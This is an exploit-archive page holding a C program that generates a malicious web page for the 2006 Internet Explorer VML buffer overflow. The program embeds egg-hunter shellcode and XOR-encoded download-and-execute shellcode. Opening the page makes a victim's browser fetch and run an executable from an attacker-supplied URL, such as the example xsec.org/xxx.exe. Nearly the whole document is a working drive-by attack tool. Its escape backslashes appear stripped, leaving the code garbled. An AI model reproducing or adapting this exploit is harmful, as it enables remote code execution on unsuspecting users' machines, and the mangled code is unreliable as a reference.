[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Internet Explorer (VML) Remote Buffer Overflow Exploit
# Published : 2006-09-20
# Author : nop
# Previous Title : MS Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP1)
# Next Title : MS Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP2)
/*
*-----------------------------------------------------------------------
*
* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
* :
* Tested : Windows 2000 Server CN
* : + Internet Explorer 6.0 SP1
* :
* Complie : cl vml.c
* :
* Usage : d:>vml
* :
* : Usage: vml <URL> [htmlfile]
* :
* : d:>vml http://xsec.org/xxx.exe xxx.htm
* :
*
*------------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;
#define NOPSIZE 260
#define MAXURL 60
//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k
// Search Shellcode
unsigned char dc[] =
"x8BxDCxBEx6Fx6Fx6Fx70x4ExBFx6Fx30x30x70x4Fx43x39"
"x3Bx75xFBx4Bx80x33xEEx39x73xFCx75xF7xFFxD3";
// Shellcode Start
unsigned char dcstart[] =
"noop";
// Download Exec Shellcode XOR with 0xee
unsigned char sc[] =
"x07x4BxEExEExEExB1x8Ax4FxDExEExEExEEx65xAExE2x65"
"x9ExF2x43x65x86xE6x65x19x84xEAxB7x06xABxEExEExEE"
"x0Cx17x86x81x80xEExEEx86x9Bx9Cx82x83xBAx11xF8x7B"
"x06xDExEExEExEEx6Dx02xCEx65x32x84xCExBDx11xB8xEA"
"x29xEAxEDxB2x8FxC0x8Bx29xAAxEDxEAx96x8BxEExEExDD"
"x2ExBExBExBDxB9xBEx11xB8xFEx65x32xBExBDx11xB8xE6"
"x84xEFx11xB8xE2xBFxB8x65x9BxD2x65x9AxC0x96xEDx1B"
"xB8x65x98xCExEDx1BxDDx27xA7xAFx43xEDx2BxDDx35xE1"
"x50xFExD4x38x9AxE6x2Fx25xE3xEDx34xAEx05x1FxD5xF1"
"x9Bx09xB0x65xB0xCAxEDx33x88x65xE2xA5x65xB0xF2xED"
"x33x65xEAx65xEDx2Bx45xB0xB7x2Dx06xB8x11x11x11x60"
"xA0xE0x02x2Fx97x0Bx56x76x10x64xE0x90x36x0Cx9DxD8"
"xF4xC1x9E";
// Shellcode End
unsigned char dcend[] =
"n00p";
// HTML Header
char * header =
"<html xmlns:v="urn:schemas-microsoft-com:vml">n"
"<head>n"
"<title>XSec.org</title>n"
"<style>n"
"v\:* { behavior: url(#default#VML); }n"
"</style>n"
"</head>n"
"<body>n"
"<v:rect style="width:20pt;height:20pt" fillcolor="red">n"
"<v:fill method="";
char * footer =
""/>n"
"</v:rect>n"
"</body>n"
"</html>n"
;
// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
{
int i=0;
unsigned int ncr = 0;
for(i=0; i<size; i+=2)
{
ncr = (buf[i+1] << 8) + buf[i];
fprintf(fp, "&#%d;", ncr);
}
}
void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};
unsigned char burl[255] = {0};
int sc_len = 0;
int psize = 0;
int i = 0;
unsigned int nop = 0x4141;
DWORD jmp = 0xeb06eb06;
if (argc < 2)
{
printf("Windows VML Download Exec Exploitn");
printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.orgn");
//printf("!!! 0Day !!! Please Keep Private!!!n");
printf("rnUsage: %s <URL> [htmlfile]rnn", argv[0]);
exit(1);
}
url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) <
10 || strlen(url) > MAXURL)
{
printf("[-] Invalid url. Must start with 'http://','ftp://' and < %d bytes.n", MAXURL);
return;
}
printf("[+] download url:%sn", url);
if(argc >=3) file = argv[2];
printf("[+] exploit file:%sn", file);
fp = fopen(file, "w+b");
//fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!n");
return;
}
// print html header
fprintf(fp, "%s", header);
fflush(fp);
for(i=0; i<NOPSIZE; i++)
{
//fprintf(fp, "&#%d;", nop);
fprintf(fp, "A");
}
fflush(fp);
// print shellcode
memset(buf, 0x90, sizeof(buf));
//memset(buf, 0x90, NOPSIZE*2);
memcpy(buf, &ret, 4);
psize = 4+8+0x10;
memcpy(buf+psize, dc, sizeof(dc)-1);
psize += sizeof(dc)-1;
memcpy(buf+psize, dcstart, 4);
psize += 4;
sc_len = sizeof(sc)-1;
memcpy(buf+psize, sc, sc_len);
psize += sc_len;
// print URL
memset(burl, 0, sizeof(burl));
strncpy(burl, url, 60);
for(i=0; i<strlen(url)+1; i++)
{
burl[i] = buf[i] ^ 0xee;
}
memcpy(buf+psize, burl, strlen(url)+1);
psize += strlen(url)+1;
memcpy(buf+psize, dcend, 4);
psize += 4;
// print NCR
convert2ncr(buf, psize);
printf("[+] buff size %d bytesn", psize);
// print html footer
fprintf(fp, "%s", footer);
fflush(fp);
printf("[+] exploit write to %s success!n", file);
}
// www.Syue.com [2006-09-20]